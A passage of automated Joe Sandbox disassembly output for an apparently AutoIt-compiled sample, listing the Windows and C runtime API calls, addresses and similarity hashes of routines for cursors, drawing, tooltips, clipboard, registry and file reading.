                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                            APIs
                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                            • SetCursor.USER32(00000000), ref: 0043075B
                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                            • SetCursor.USER32(00000000), ref: 00430773
                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                            • SetCursor.USER32(00000000), ref: 0043078B
                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                            • SetCursor.USER32(00000000), ref: 004307A3
                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                            • SetCursor.USER32(00000000), ref: 004307BB
                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                            • SetCursor.USER32(00000000), ref: 004307D3
                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                            • SetCursor.USER32(00000000), ref: 004307EB
                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                            • SetCursor.USER32(00000000), ref: 00430803
                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                            • SetCursor.USER32(00000000), ref: 0043081B
                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                            • SetCursor.USER32(00000000), ref: 00430833
                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                            • SetCursor.USER32(00000000), ref: 0043084B
                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                            • SetCursor.USER32(00000000), ref: 00430863
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                            • SetCursor.USER32(00000000), ref: 0043087B
                            • SetCursor.USER32(00000000), ref: 00430887
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                            • SetCursor.USER32(00000000), ref: 0043089F
                            Similarity
                            • API ID: Cursor$Load
                            • String ID:
                            • API String ID: 1675784387-0
                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                            APIs
                            • GetSysColor.USER32(0000000E), ref: 00430913
                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                            • GetSysColor.USER32(00000012), ref: 00430933
                            • SetTextColor.GDI32(?,?), ref: 0043093B
                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                            • GetSysColor.USER32(0000000F), ref: 00430959
                            • CreateSolidBrush.GDI32(?), ref: 00430962
                            • GetSysColor.USER32(00000011), ref: 00430979
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                            • SetBkColor.GDI32(?,?), ref: 004309A6
                            • SelectObject.GDI32(?,?), ref: 004309B4
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                            • GetSysColor.USER32(00000011), ref: 00430A9F
                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                            • SelectObject.GDI32(?,?), ref: 00430AD0
                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                            • SelectObject.GDI32(?,?), ref: 00430AE3
                            • DeleteObject.GDI32(?), ref: 00430AE9
                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                            Similarity
                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1582027408-0
                            • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                            • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                            Similarity
                            • API ID: CloseConnectCreateRegistry
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 3217815495-966354055
                            • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                            • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                            APIs
                            • GetCursorPos.USER32(?), ref: 004566AE
                            • GetDesktopWindow.USER32 ref: 004566C3
                            • GetWindowRect.USER32(00000000), ref: 004566CA
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                            • DestroyWindow.USER32(?), ref: 00456746
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                            • IsWindowVisible.USER32(?), ref: 0045682C
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                            • GetWindowRect.USER32(?,?), ref: 00456873
                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                            • CopyRect.USER32(?,?), ref: 004568BE
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                            Similarity
                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                            • String ID: ($,$tooltips_class32
                            • API String ID: 225202481-3320066284
                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                            • GetClientRect.USER32(?,?), ref: 00471D05
                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                            • GetClientRect.USER32(?,?), ref: 00471E8A
                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                            Similarity
                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                            • String ID: @$AutoIt v3 GUI
                            • API String ID: 867697134-3359773793
                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$__wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                            • API String ID: 790654849-32604322
                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                            • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                            APIs
                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                            • _fseek.LIBCMT ref: 00452B3B
                            • __wsplitpath.LIBCMT ref: 00452B9B
                            • _wcscpy.LIBCMT ref: 00452BB0
                            • _wcscat.LIBCMT ref: 00452BC5
                            • __wsplitpath.LIBCMT ref: 00452BEF
                            • _wcscat.LIBCMT ref: 00452C07
                            • _wcscat.LIBCMT ref: 00452C1C
                            • __fread_nolock.LIBCMT ref: 00452C53
                            • __fread_nolock.LIBCMT ref: 00452C64
                            • __fread_nolock.LIBCMT ref: 00452C83
                            • __fread_nolock.LIBCMT ref: 00452C94
                            • __fread_nolock.LIBCMT ref: 00452CB5
                            • __fread_nolock.LIBCMT ref: 00452CC6
                            • __fread_nolock.LIBCMT ref: 00452CD7
                            • __fread_nolock.LIBCMT ref: 00452CE8
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452D78
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                            • String ID:
                            • API String ID: 2054058615-0
                            • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                            • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window
                            • String ID: 0
                            • API String ID: 2353593579-4108050209
                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                            APIs
                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                            • GetWindowDC.USER32(?), ref: 0044A0F6
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                            • GetSysColor.USER32(0000000F), ref: 0044A131
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                            • GetSysColor.USER32(00000005), ref: 0044A15B
                            • GetWindowDC.USER32(?), ref: 0044A1BE
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                            • GetSysColor.USER32(00000008), ref: 0044A265
                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                            • String ID:
                            • API String ID: 1744303182-0
                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                            • __mtterm.LIBCMT ref: 00417C34
                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                            • __init_pointers.LIBCMT ref: 00417CE6
                            • __calloc_crt.LIBCMT ref: 00417D54
                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                            • API String ID: 4163708885-3819984048
                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2485277191-404129466
                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                            APIs
                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                            • SetWindowTextW.USER32(?,?), ref: 00454678
                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                            • GetWindowRect.USER32(?,?), ref: 004546F5
                            • SetWindowTextW.USER32(?,?), ref: 00454765
                            • GetDesktopWindow.USER32 ref: 0045476F
                            • GetWindowRect.USER32(00000000), ref: 00454776
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                            • GetClientRect.USER32(?,?), ref: 004547D2
                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                            APIs
                            • _wcslen.LIBCMT ref: 00464B28
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                            • _wcslen.LIBCMT ref: 00464C28
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                            • _wcslen.LIBCMT ref: 00464CBA
                            • _wcslen.LIBCMT ref: 00464CD0
                            • _wcslen.LIBCMT ref: 00464CEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
